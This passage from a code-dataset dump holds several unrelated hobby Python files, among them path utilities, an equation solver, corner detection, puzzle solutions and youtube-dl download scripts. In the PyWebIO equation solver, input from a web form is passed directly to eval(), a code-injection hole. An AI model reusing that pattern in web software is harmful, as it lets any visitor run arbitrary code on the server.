pp.show()\n","repo_name":"pawelngei/neuroon-notebook","sub_path":"lib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30315986716","text":"\"\"\"\nThis module contains file- and path-related methods, classes, and modules.\n\"\"\"\n\n__docformat__ = \"markdown\"\n\n# ---------------------------------------------------------------------------\n# Imports\n# ---------------------------------------------------------------------------\n\nimport os as _os\nimport shutil\nfrom typing import (Sequence, Mapping, Any, Optional, Union, NoReturn,\n Generator, Tuple)\n\n# ---------------------------------------------------------------------------\n# Exports\n# ---------------------------------------------------------------------------\n\n__all__ = ['unlink_quietly', 'recursively_remove', 'copy', 'touch',\n 'pathsplit', 'eglob', 'universal_path', 'native_path',\n 'list_recursively', 'includer']\n\n# ---------------------------------------------------------------------------\n# Functions\n# ---------------------------------------------------------------------------\n\ndef unlink_quietly(*paths: Union[str, Sequence[str]]) -> NoReturn:\n \"\"\"\n Like the standard `os.unlink()` function, this function attempts to\n delete a file. However, it swallows any exceptions that occur during the\n unlink operation, making it more suitable for certain uses (e.g.,\n in `atexit` handlers).\n\n **Parameters**\n\n - `paths` (`str` or sequence of `str`): path(s) to unlink\n \"\"\"\n def looper(*paths):\n for i in paths:\n if type(i) == list:\n for path in i:\n yield path\n else:\n yield i\n\n for path in looper(*paths):\n try:\n _os.unlink(path)\n except:\n pass\n\ndef recursively_remove(dir: str) -> NoReturn:\n \"\"\"\n Recursively remove all files and directories below and including a\n specified directory.\n\n **Parameters**\n\n - `dir` (`str`): path to directory to remove\n \"\"\"\n if not _os.path.exists(dir):\n return\n\n shutil.rmtree(dir)\n\n\ndef list_recursively(dir: str, *,\n include_files: bool = True,\n include_dirs: bool = True) -> Generator[None, str, None]:\n \"\"\"\n Recursively list the contents of a directory. Yields the contents of\n the directory and all subdirectories. 
This method returns a generator,\n so it evaluates its recursive walk lazily. This function is just a\n simple wrapper around `os.walk`.\n\n Each yielded value is a partial path, relative to the original directory.\n\n **Parameters**\n\n - `dir` (`str`): Path to directory to list\n - `include_files` (`bool`): Whether or not to yield directories. `True`\n by default.\n - `include_dirs` (`bool`): Whether or not to yield files. `True` by\n default.\n\n **Yields**\n\n partial paths of all directories and/or files below the specified directory\n\n **Raises**\n\n `ValueError`: If `dir` does not exist, or if `dir` exists but is not a\n directory.\n \"\"\"\n if not _os.path.isdir(dir):\n raise ValueError(\"{0} is not a directory.\".format(dir))\n\n from grizzled.os import working_directory\n\n with working_directory(dir):\n for dirpath, dirnames, filenames in _os.walk('.'):\n if include_dirs:\n for d in dirnames:\n yield _os.path.normpath(_os.path.join(dirpath, d))\n if include_files:\n for f in filenames:\n yield _os.path.normpath(_os.path.join(dirpath, f))\n\n\ndef copy(files : Union[Sequence[str], str],\n target_dir : str,\n create_target : bool = False) -> None:\n \"\"\"\n Copy one or more files to a target directory.\n\n **Parameters**\n\n - `files` (`str` or `list` of `str`): a string representing a single path,\n or a list of strings representing multiple paths, to be copied\n - `target_dir` (`str`): path to the target directory\n - `create_target` (`bool`): whether or not to create the target\n\n **Returns** Nothing\n\n **Raises**\n\n - `OSError`: `target_dir` does not exist and `create_target` is `False`.\n \"\"\"\n if type(files) == str:\n files = [files]\n\n if not _os.path.exists(target_dir):\n if create_target:\n _os.mkdir(target_dir)\n\n if _os.path.exists(target_dir) and (not _os.path.isdir(target_dir)):\n raise OSError(\n\t 'Cannot copy files to non-directory \"{0}\"'.format(target_dir)\n\t)\n\n for f in files:\n targetFile = _os.path.join(target_dir, _os.path.basename(f))\n open(targetFile, 'wb').write(open(f, 'rb').read())\n\ndef touch(files: Union[str, Sequence[str]], *,\n times: Optional[Tuple[int, int]] = None,\n ns: Optional[Tuple[int, int]] = None) -> NoReturn:\n \"\"\"\n Similar to the Unix *touch* command, this function:\n\n - updates the access and modification times for any existing files\n in a list of files\n - creates any non-existent files in the list of files\n\n `files` can be a single string or a sequence of strings.\n\n If any file in the list is a directory, this function will throw an\n exception.\n\n - If `ns` is not `None`, it must be a 2-tuple of the form\n `(atime_ns, mtime_ns)` where each member is an `int` expressing\n nanoseconds.\n - If `times` is not `None`, it must be a 2-tuple of the form\n `(atime, mtime)` where each member is an `int` or `float` expressing\n seconds.\n - If `times` is `None` and `ns` is `None`, this is equivalent to\n specifying `ns=(atime_ns, mtime_ns)` where both times are the current\n time.\n - If both are specified, `ValueError` is raised.\n \"\"\"\n if type(files) == str:\n files = [files]\n\n if (times is not None) and (ns is not None):\n raise ValueError(\"Can't specify both ns and times.\")\n\n for f in files:\n if _os.path.exists(f):\n if not _os.path.isfile(f):\n raise OSError('Cannot touch non-file \"{0}\"'.format(f))\n if ns:\n _os.utime(f, times=None, ns=ns)\n else:\n _os.utime(f, times)\n\n else:\n # Doesn't exist. 
Create it.\n open(f, 'wb').close()\n\n\ndef pathsplit(path: str) -> Sequence[str]:\n \"\"\"\n Split a path into an array of path components, using the file separator\n (e.g., '/' on POSIX systems) that's appropriate for the underlying operating\n system. Does not take drive letters into account. If there's a Windows\n drive letter in the path, it'll end up with the first component.\n\n **Parameters**\n\n - `path` (`str`): path to split. Can be relative or absolute\n\n **Returns**\n\n a list of path components\n \"\"\"\n result = []\n (head, tail) = _os.path.split(path)\n\n if (not head) or (head == path):\n # No file separator. Done.\n pass\n\n else:\n result = pathsplit(head)\n\n if tail:\n result += [tail]\n\n return result\n\ndef _find_matches(pattern_pieces: Sequence[str],\n directory: str) -> Generator[str, str, None]:\n \"\"\"\n Used by eglob.\n \"\"\"\n import glob\n\n if not _os.path.isdir(directory):\n return\n\n piece = pattern_pieces[0]\n last = len(pattern_pieces) == 1\n remaining_pieces = []\n if piece == '**':\n if not last:\n remaining_pieces = pattern_pieces[1:]\n\n for root, dirs, files in _os.walk(directory):\n if last:\n # At the end of a pattern, \"**\" just recursively matches\n # directories.\n yield _os.path.normpath(root)\n else:\n # Recurse downward, trying to match the rest of the\n # pattern.\n sub_result = _find_matches(remaining_pieces, root)\n for partial_path in sub_result:\n yield _os.path.normpath(partial_path)\n\n else:\n # Regular glob pattern.\n\n matches = glob.glob(_os.path.join(directory, piece))\n if len(matches) > 0:\n if last:\n for match in matches:\n yield _os.path.normpath(match)\n else:\n remaining_pieces = pattern_pieces[1:]\n for match in matches:\n sub_result = _find_matches(remaining_pieces, match)\n for partial_path in sub_result:\n yield _os.path.normpath(partial_path)\n\ndef eglob(pattern: str, directory: str = '.') -> Generator[str, str, None]:\n \"\"\"\n Extended glob function that supports the all the wildcards supported\n by the Python standard `glob` routine, as well as a special `**`\n wildcard that recursively matches any directory.\n\n **Parameters**\n\n - `pattern` (`str`): The wildcard pattern.\n - `directory` (`str`): The directory in which to do the globbing. Defaults\n to `.`\n\n **Yields**\n\n The matched paths.\n \"\"\"\n pieces = pathsplit(pattern)\n return _find_matches(pieces, directory)\n\ndef universal_path(path: str) -> str:\n \"\"\"\n Converts a path name from its operating system-specific format to a\n universal path notation. Universal path notation always uses a Unix-style\n \"/\" to separate path elements. A universal path can be converted to a\n native (operating system-specific) path via the `native_path()`\n function. Note that on POSIX-compliant systems, this function simply\n returns the `path` parameter unmodified.\n\n **Parameters**\n\n - `path` (`str`): the path to convert to universal path notation\n\n **Returns**\n\n The path in universal path notation.\n \"\"\"\n if _os.name != 'posix':\n path = path.replace(_os.path.sep, '/')\n\n return path\n\ndef native_path(path: str) -> str:\n \"\"\"\n Converts a path name from universal path notation to the operating\n system-specific format. Universal path notation always uses a Unix-style\n \"/\" to separate path elements. A native path can be converted to a\n universal path via the `universal_path()` function. 
Note that on\n POSIX-compliant systems, this function simply returns the `path`\n parameter unmodified.\n\n **Parameters**\n\n - `path` (`str`): the universal path to convert to native path notation\n\n **Returns**\n\n The path in native path notation.\n \"\"\"\n if _os.name != 'posix':\n path = path.replace('/', _os.path.sep)\n\n return path\n","repo_name":"bmc/grizzled-python","sub_path":"grizzled/file/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"6497559332","text":"from pywebio import start_server\nfrom pywebio.input import *\nfrom pywebio.output import *\n\ndef solve_r(Equation) :\n r = Equation.replace(\" \",\"\").lower()\n try :\n if 'x^3' in r :\n \n if not '=' in r :\n r += '=0'\n a = list(r.split(\"x^3\"))[0]\n b = r.replace(str(a)+\"x^3\"+\"+\",\"\").replace(str(a)+\"x^3\",\"\").split(\"x^2\")[0]\n c = r.replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+\"+\",\"\").replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\",\"\").split(\"x\")[0].replace(\"+\",\"\")\n d = r.replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+str(\"+\"+str(c) if float(c) > 0 else str(c))+\"x\"+\"+\",\"\").replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+str(\"+\"+str(c) if float(c) > 0 else str(c))+\"x\",\"\").split(\"=\")[0].replace(\"+\",\"\")\n e = r.split(\"=\")[1]\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n e = float(e)\n\n if d == 0 and e == 0 :\n Solve_Cubic_Equation_var_1 = b\n Solve_Cubic_Equation_var_2 = (b * b - 4 * a * c) ** 0.5\n Solve_Cubic_Equation_var_3 = 2 * a\n return 'x = ' + str(-Solve_Cubic_Equation_var_1 + Solve_Cubic_Equation_var_2) / (Solve_Cubic_Equation_var_3)\n else :\n Solve_Cubic_Equation_xess = [x*0.001 for x in range(2*-100000, 2*100000+1)]\n\n for l in Solve_Cubic_Equation_xess :\n if ((a*l ** 3) + (b*l**2) + (c * l) + (d) == e) :\n return 'x = ' + str(l)\n break\n else :\n continue \n\n elif 'x^2' in r :\n if not '=' in r :\n r += '=0'\n\n a = list(r.split(\"x^2\"))[0]\n b = r.replace(str(a)+\"x^2+\",\"\").replace(str(a)+\"x^2\",\"\")\n b = b.split(\"x\")[0]\n var2 = \"+\"+str(b) if float(b) > 0 else str(b)\n c = r.replace(str(a)+\"x^2\"+str(var2)+\"x\"+\"+\",\"\").replace(str(a)+\"x^2\"+str(var2)+\"x\",\"\")\n c = c.split(\"=\")[0].replace(\"+\",\"\")\n d = r.split(\"=\")[1]\n\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n\n\n Solve_Quadratic_Equation_var_0 = c + (-d)\n Solve_Quadratic_Equation_var_1 = -b\n Solve_Quadratic_Equation_var_2 = (b * b - 4 * a * Solve_Quadratic_Equation_var_0) ** 0.5\n Solve_Quadratic_Equation_var_3 = 2 * a\n return 'x = ' + str((Solve_Quadratic_Equation_var_1 + Solve_Quadratic_Equation_var_2) / (Solve_Quadratic_Equation_var_3))\n\n elif 'x' in r :\n a = r.split('x')[0]\n b = r.replace(str(a)+'x','').split('=')[0]\n c = r.split('=')[1]\n a = float(a)\n b = float(b)\n c = float(c)\n \n var1 = c + (-b)\n return 'x = ' + str(var1/a)\n else :\n return eval(Equation.replace('^','**'))\n except :\n return 'Error'\n \n\nput_html('
<h1>zezn Equation</h1>
')\neq = input_group('Enter an Equation to Solve it !'\n ,[\n input(name='Eq')\n ]\n)\n\nput_text('Result : ' + str(solve_r(eq['Eq'])))\ninput()\n","repo_name":"Zezn-Corportion/Test","sub_path":"WEB.py","file_name":"WEB.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39586124907","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom predictfunc import Parameter,load_model,predictJava\nimport sys\nimport getopt\nimport time\n\ndef main(datavalg,img_path):\n\n \"\"\"\n datavalg = sys.argv[1]\n\n img_path = sys.argv[2]\n \"\"\"\n\n # print(datavalg)\n # print(img_path)\n p=Parameter(32,180,180)\n train_ds = None\n val_ds = None \n data_dir= None \n #read_data(datavalg)\n #train_ds = training_data(p) \n #val_ds = valid_data(p)\n #model = load_model(datavalg)\n datavalg = int (datavalg)\n if(datavalg == 1): \n text = predictJava(p,model1,datavalg,img_path)\n elif(datavalg == 2):\n text = predictJava(p,model2,datavalg,img_path)\n \n \n \n return text\n \n #sourceFile = open('C:/Users/krist/Code/IdeaProjects/FindFirkanter/src/com/company/demo.txt','w')\n #print(text,file = sourceFile)\n #sourceFile.close()\n\n\n\nmodel1 = load_model(1)\nmodel2 = load_model(2) \ns = sys.stdin.readline().strip()\nwhile s not in ['quit']:\n val = s.split(',') \n text = main(val[0],val[1])\n sys.stdout.write(text+'\\n')\n sys.stdout.flush()\n s = sys.stdin.readline().strip()\n \n","repo_name":"s172133/backend_cdio","sub_path":"testing/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27813081712","text":"\"\"\"\nModule dependencies percentage.\n\nTo-do:\n\"\"\"\nimport re\nimport sys\n\n\nRE_FROM = re.compile(\"from (.*) import (.*)\")\nRE_IMPT = re.compile(\"import (.*)\")\n\n\ndef main(filename):\n \"\"\"Main.\"\"\"\n sourcese = \"\"\n try:\n with open(filename, 'r') as source_file:\n sourcese = source_file.read().splitlines()\n except IOError:\n print(\"Not found file.\")\n exit()\n\n list_from = []\n list_impt = []\n for source in sourcese:\n res_from = RE_FROM.findall(source)\n res_impt = RE_IMPT.findall(source)\n if res_from:\n list_from.append(res_from)\n elif res_impt:\n list_impt.append(res_impt)\n else:\n continue\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n exit()\n main(sys.argv[1])\n","repo_name":"Hikai/Language","sub_path":"Python/module_dependency.py","file_name":"module_dependency.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21666566214","text":"#https://leetcode.com/problems/perfect-squares/\n\nfrom collections import deque\nimport math\n\nclass Solution:\n #BFS solution. 
Faster solutions likely exist that use approaches other than BFS, may need to revisit this problem.\n def numSquares(self, n: int) -> int:\n\n #Helper method to get the list of neighbors for a given node\n def getNeighbors(sum: int) -> list[int]:\n neighbors = []\n maxRange = int(math.sqrt(n)) #We will limit the perfect squares to be subtracted depending on n for efficiency\n for i in range(1, maxRange + 1):\n neighbors.append(sum - (i * i)) #Subtract a perfect square from the current node to find its neighbors\n return neighbors\n\n #Visualize this as a graph where the root node is n, and we want to reach node 0\n #For a given node, its neighbors are nodes that can be reached by subtracting a perfect square\n #Use BFS to find the shortest route from node n to node 0\n #We enqueue a list consisting of the current node, and the length of the path it took to reach this node from the root\n queue = deque()\n queue.append([n, 0]) #[Current node, number of perfect squares involved in the sum (i.e. length of path to reach this node)]\n visited = set()\n visited.add(n) #We have visited node n\n while queue: #Just a standard BFS traversal\n currNode = queue.popleft()\n if currNode[0] == 0: #If we have found node 0...\n return currNode[1] #We've already computed the length of the path it took to reach this node\n neighbors = getNeighbors(currNode[0]) #Get all the neighbors of currNode\n for neighbor in neighbors:\n if neighbor not in visited:\n queue.append([neighbor, currNode[1] + 1]) #We have enqueued a neighbor, the length of the path increases by one\n visited.add(neighbor)\n \n return 0 #This should be reached since the problem statement assures us that a sum of perfect squares exists for n\n\n\ndef main():\n solution = Solution()\n print(solution.numSquares(12))\n \n \n\nif __name__ == \"__main__\": #Entry point\n main() #Calling main method","repo_name":"Adam-1776/Practice","sub_path":"DSA/perfectSquares/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31114502574","text":"import sys\nimport numpy as np\nimport pylab\nimport scipy.ndimage.filters as ndi\nimport skimage.io\nimport skimage.transform\nimport cv2\nfrom random import shuffle\nfrom operator import itemgetter\n\n\n\ndef gaussian1D(n, sigma=3.0):\n result = np.zeros(n)\n mid = int(n / 2)\n result = [(1 / (np.sqrt(2 * np.pi * sigma**2)) * (np.e**(-((i**2) / (2 * sigma**2))))) for i in\n range(-mid, mid + 1)]\n\n return result\n\n#helper function\ndef remove_eig(list_tuples):\n new_list = []\n for i in range(len(list_tuples)):\n x,y,e = list_tuples[i]\n new_list.append([x, y])\n return new_list\n\n\ndef find_corners(image, dx, dy, thresh, output, m=4):\n\n x2 = dx ** 2\n xy = dx*dy\n y2 = dy ** 2\n\n offset = 2*m+1\n\n corners = []\n percentCorners = .1 #percentage of corners to actually draw\n\n print (\"Looking for corners...\")\n for y in range(offset, image.shape[0]-offset):\n for x in range(offset, image.shape[1]-offset):\n\n Fx2 = x2[y - offset:y + offset, x - offset:x + offset]\n Fxy = xy[y - offset:y + offset, x - offset:x + offset]\n Fy2 = y2[y - offset:y + offset, x - offset:x + offset]\n\n Fx2 = Fx2.sum()\n Fxy = Fxy.sum()\n Fy2 = Fy2.sum()\n\n C = np.array([[Fx2, Fxy],[Fxy, Fy2]]) #covariance matrix\n e,v = np.linalg.eig(C) #calc eigenvalues\n e = np.amin(e) #smallest eigenvalue = corner response\n\n if e > thresh:\n corners.append([x,y,e])\n\n corners.sort(key=itemgetter(2), 
reverse=True)\n\n corner_points = remove_eig(corners)\n corner_points_copy = list(corner_points)\n\n for i in range(len(corner_points)):\n\n x,y = corner_points[i]\n corner_points_copy.append([x,y])\n\n #Remove surrounding neighbors from list as they are not the maximum\n if [x+1, y] in corner_points_copy: corner_points_copy.remove([x+1, y])\n if [x+1,y+1] in corner_points_copy: corner_points_copy.remove([x+1, y+1])\n if [x + 1, y - 1] in corner_points_copy: corner_points_copy.remove([x+1, y-1])\n if [x, y + 1] in corner_points_copy: corner_points_copy.remove([x, y+1])\n if [x, y - 1] in corner_points_copy: corner_points_copy.remove([x, y-1])\n if [x - 1, y] in corner_points_copy: corner_points_copy.remove([x-1, y])\n if [x - 1, y - 1] in corner_points_copy: corner_points_copy.remove([x-1, y-1])\n if [x - 1, y + 1] in corner_points_copy: corner_points_copy.remove([x-1, y+1])\n\n shuffle(corner_points_copy)\n\n for i in range(int(len(corner_points_copy)*percentCorners)):\n x,y = corner_points_copy[i]\n cv2.circle(output,(x,y),2,(1,0,0),-1)\n\n\n return output\n\n\ndef main():\n\n\tl = ['bicycle.bmp','bird.bmp','dog.bmp','einstein.bmp','plane.bmp','toy_image.jpg']\n\tg = ['bicycle','bird','dog','einstein','plane','toy_image']\n\ts = \"data/\"\n\tfor i in range(0,len(l)):\n\t\tI = skimage.img_as_float(skimage.io.imread(s+l[i]))\n\n\t\tI = I.astype('float32')\n\t\tI_grey = cv2.cvtColor(I, cv2.COLOR_RGB2GRAY)\n\n\t\tsigma = 1\n\t\tkernel_size = 9\n\t\tH = np.array(gaussian1D(kernel_size, sigma))\n\t\tV = H\n\n\t\tdv = np.array([-1, 0, 1])\n\n\t\tH_dx = ndi.convolve1d(H, dv)\n\t\tV_dy = ndi.convolve1d(V, dv)\n\n\t\tG_x = ndi.convolve1d(I_grey, H_dx, 0)\n\t\tG_y = ndi.convolve1d(I_grey, V_dy, 1)\n\n\t\tthreshold = 0.55\n\n\t\tresult = find_corners(I_grey, G_x, G_y, threshold, I)\n\n\t\tpylab.imshow(result)\n\n\t\tskimage.io.imsave('houtput/'+g[i]+'.png', result.astype('float32'))\n\n\t\tpylab.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gskumar77c/corner-detection","sub_path":"harris.py","file_name":"harris.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74341975868","text":"orderCount = int(input())\r\n\r\nnumArr = []\r\nfor _ in range(orderCount):\r\n numArr.append(int(input()))\r\n\r\nstack = []\r\norderList = []\r\nascNum = 1\r\nisImpossible = False\r\nfor num in numArr:\r\n while isImpossible == False:\r\n if len(stack) == 0:\r\n if num >= ascNum:\r\n stack.append(ascNum)\r\n orderList.append(\"+\")\r\n ascNum += 1\r\n else:\r\n isImpossible = True\r\n break\r\n else:\r\n if num == stack[-1]:\r\n stack.pop()\r\n orderList.append(\"-\")\r\n break\r\n if num >= ascNum:\r\n stack.append(ascNum)\r\n orderList.append(\"+\")\r\n ascNum += 1\r\n elif num < ascNum:\r\n stack.pop()\r\n orderList.append(\"-\")\r\n\r\nif isImpossible == True:\r\n print(\"NO\")\r\nelse:\r\n for order in orderList:\r\n print(order)\r\n","repo_name":"KingPiggy/PS","sub_path":"Baekjoon/스택/1874번 스택 수열.py","file_name":"1874번 스택 수열.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8411900563","text":"from youtube_dl import YoutubeDL\n\n\n# Download two videos from Youtube\ndl = YoutubeDL()\ndl.download([\"https://www.youtube.com/watch?v=ZhKnSp2cX98\",\"https://www.youtube.com/watch?v=8MPbR6Cbwi4\"])\n\n# Search and then download an audio from Youtube videos\noptions = {\n \"format\": 
\"bestaudio/audio\"\n}\n\n\ndl = YoutubeDL(options)\ndl.download([\"https://www.youtube.com/watch?v=by3yRdlQvzs\"])\n\n#Search according to key words\noptions = {\n \"default_search\": \"ytsearch\",\n \"max_downloads\": 1\n}\ndl = YoutubeDL(options)\ndl.download([\"Mơ Vũ Cát Tường\"])\n\n# Search and then download an audio from Youtube video\noptions = {\n \"format\": \"bestaudio/audio\",\n \"default_search\": \"ytsearch\",\n \"max_downloads\": 1\n}\n\ndl = YoutubeDL(options)\ndl.download([\"We are young\"])\n","repo_name":"taanh99ams/taanh-lab-c4e15","sub_path":"Lab 2/HW_Lab2/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10279088744","text":"import numpy as np\nfrom skimage import io\nfrom skimage.color import *\nfrom matplotlib import pyplot as plt\n\n# sorry it will take a long time.\n# i have given the result in out folder. maybe you can run this code in GPU.\ndef CartoonNizer_30988519(img):\n # Euclidean distance\n # Norm of two points\n def distance(x1, y1, x2, y2):\n return np.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n # Difference of the pixels’values.\n def color_diff(c1, c2):\n return np.abs(c1 - c2)\n\n def gaussian(sigma_s, x):\n return ((np.exp(-(x * x) / (2 * (sigma_s ** 2)))) / (sigma_s * np.sqrt(2 * np.pi)))\n\n def color_distance(sigma_r, x):\n return (1 / (1 + (x ** 2 / sigma_r ** 2)))\n\n def bilateral_filter(src, filtered_img, diameter, x, y, sigma_s, sigma_r):\n\n hl = int(diameter / 2)\n filtered_temp = 0\n w_tot = 0\n for i in range(diameter):\n for j in range(diameter):\n neighbour_x = x - (hl - i)\n neighbour_y = y - (hl - j)\n\n if neighbour_x < 0:\n neighbour_x = 0\n if neighbour_y < 0:\n neighbour_y = 0\n\n if neighbour_x >= len(src):\n neighbour_x -= len(src)\n if neighbour_y >= len(src[0]):\n neighbour_y -= len(src[0])\n\n g_dist = gaussian(sigma_s, distance(x, y, neighbour_x, neighbour_y))\n\n d_col = color_distance(sigma_r, color_diff(src[neighbour_x][neighbour_y], src[x][y]))\n\n w = g_dist * d_col\n filtered_temp += src[neighbour_x][neighbour_y] * w\n\n w_tot += w\n\n filtered_temp = filtered_temp / w_tot\n\n filtered_img[x][y] = filtered_temp\n return filtered_img\n\n def my_filter(src, diameter, sigma_s, sigma_r):\n filtered_img = np.zeros(src.shape)\n\n for i in range(len(src)):\n for j in range(len(src[0])):\n bilateral_filter(src, filtered_img, diameter, i, j, sigma_s, sigma_r)\n\n return filtered_img\n\n # Process 3 channels\n filtered_R = my_filter(img[:, :, 0], 15, 150, 20)\n filtered_G = my_filter(img[:, :, 1], 15, 150, 20)\n filtered_B = my_filter(img[:, :, 2], 15, 150, 20)\n\n # Combine 3 channels\n bilateral = np.zeros([filtered_R.shape[0], filtered_R.shape[1], 3])\n bilateral[:, :, 0] = filtered_R[:, :]\n bilateral[:, :, 1] = filtered_G[:, :]\n bilateral[:, :, 2] = filtered_B[:, :]\n\n # Result from skimage function\n from skimage.restoration import denoise_bilateral as bilateralfilter\n bilateral_lib = bilateralfilter(img, win_size=15, sigma_color=20,\n sigma_spatial=150, bins=1000, multichannel=True)\n\n # Compare images\n fig, axes = plt.subplots(1, ncols=3, figsize=(15, 10))\n ax = axes.ravel()\n ax[0].imshow(img)\n ax[0].set_title(\"output of original image\")\n ax[1].imshow(bilateral / 255)\n ax[1].set_title(\"output of my bilateral\")\n ax[2].imshow(bilateral_lib)\n ax[2].set_title(\"output of function:bilateralfilter\")\n plt.show()\n io.imsave('./out/cartoon.jpg', bilateral)\n\n\nif __name__ == 
'__main__':\n # Read image\n img = io.imread(\"./test/aruto.jpg\")\n CartoonNizer_30988519(img)\n\n\n\n","repo_name":"lsunyusei/FIT-5221-cv","sub_path":"assignment2/CartoonNizer_30988519.py","file_name":"CartoonNizer_30988519.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8096987601","text":"\"\"\"Quick and dirty script to build a image of all of the tiles\"\"\"\nimport PIL.Image\nimport pathlib\nimport random\n\ndest = PIL.Image.new('RGB', (640, 480), None)\n\nsamples = list(pathlib.Path(\"data\").glob(\"*/tile*.png\"))\n\nx = 0\ny = 0\nwhile y < dest.height:\n file = random.choice(samples)\n print(f\"({x}, {y}) {file}\")\n src = PIL.Image.open(file).convert('RGB')\n dest.paste(src, (x, y))\n x += src.width\n if x > dest.width:\n x = 0\n y += src.height\ndest.save('samples.png')\n\n\n\n\n","repo_name":"dewiniaid/sigsolve","sub_path":"justforfun.py","file_name":"justforfun.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"37696050203","text":"import util\n\n\nclass Vehicle:\n def __init__(self, brand, type, color):\n self.brand = brand\n self.type = type\n self.color = color\n self.rent_per_day = \"\"\n print(f\"It is {self.brand} {self.type} and its color is {self.color}.\")\n\n def show_vehicle(self):\n show = \"You approach the vehicle. \" \\\n + self.open_door() \\\n + self.sit_and_switch_engine() \\\n + self.inspect_vehicle() \\\n + self.honk()\n return show\n\n def open_door(self):\n return \"You open a door.\\n\"\n\n def sit_and_switch_engine(self):\n return \"You sit and switch engine.\\n\"\n\n def inspect_vehicle(self):\n return \"You inspect lights, liquids and wipers.\\n\"\n\n def honk(self):\n return \"You honk. It sounds:'Meeeep, meeeeep'.\"\n\n def set_rent_per_day(self, rent_per_day):\n self.rent_per_day = rent_per_day\n\n def rent_price(self, days):\n days = util.validate_days(days)\n\n if 0 < days <= 7:\n return self.rent_per_day * days\n elif 7 < days <= 14:\n return self.rent_per_day * days * 0.9\n elif 14 < days <= 21:\n return self.rent_per_day * days * 0.8\n else:\n return self.rent_per_day * days * 0.7\n\n def rent_price_text(self, days):\n print(f\"Rent of {self.brand} {self.type} is \"\n f\"{self.rent_price(days):.0f} Kč for {days} days.\\n\\n\")\n\n\nclass Car(Vehicle):\n def __init__(self, brand, type, color, number_of_door, number_of_seats, fuel):\n self.number_of_door = number_of_door\n self.number_of_seats = number_of_seats\n self.fuel = fuel\n print(\"This vehicle is car.\")\n super().__init__(brand, type, color)\n print(f\"It has {self.number_of_door} door and \"\n f\"{self.number_of_seats} seats.\")\n print(f\"It runs on {self.fuel}.\")\n super().set_rent_per_day(600)\n\n\nclass Motorcycle(Vehicle):\n def __init__(self, brand, type, color, fuel):\n self.fuel = fuel\n print(\"This vehicle is motorcycle.\")\n super().__init__(brand, type, color)\n print(f\"It runs on {self.fuel}.\")\n super().set_rent_per_day(3500)\n\n def show_vehicle(self):\n show = \"You approach the vehicle. 
\" \\\n + self.sit_and_switch_engine() \\\n + self.inspect_vehicle() \\\n + self.honk()\n return show\n\n def inspect_vehicle(self):\n return \"You inspect lights and liquids.\\n\"\n\n\nclass Truck(Vehicle):\n def __init__(self, brand, type, color, fuel):\n self.fuel = fuel\n super().__init__(brand, type, color)\n super().set_rent_per_day(4000)\n\n def about_vehicle(self):\n print(\"This vehicle is car.\")\n super().about_vehicle()\n print(\"It has 2 doors and 2 seats.\")\n print(f\"It runs on {self.fuel}.\")\n\n def sit_and_switch_engine(self):\n return \"You climb into cab, sit and switch engine.\\n\"\n\n def honk(self):\n return \"You honk. It goes:'Traaaaa, traaaaaaaaaaaa.'\"\n\n\noctavia = Car(\"Škoda\", \"Octavia 1\", \"silver\", \"5\", \"5\", \"gasoline\")\nprint(octavia.show_vehicle())\noctavia.rent_price_text(5)\n\nkawasaki = Motorcycle(\"Kawasaki\", \"Ninja\", \"green\", \"gasoline\")\nprint(kawasaki.show_vehicle())\nkawasaki.rent_price_text(10)\n\nman = Truck(\"MAN\", \"TGX4X4\", \"white\", \"diesel\")\nprint(man.show_vehicle())\nman.rent_price_text(25)\n","repo_name":"Pavucinap/PyLadies","sub_path":"ulohy_09/vehicles.py","file_name":"vehicles.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8948472059","text":"from tkinter import *\nfrom tkinter import messagebox\nroot = Tk()\nroot.title('Diferencia finitas')\n# Para editar el tamanno de la interfaz\nroot.geometry('925x550+300+200')\nroot.configure(bg=\"#fff\")\nroot.resizable(False,False)\n\nimg = PhotoImage(file='logoAN.png')\nLabel(root,image=img,bg='white').place(x=50,y=50)\n\n# Declaracion donde ingresara los 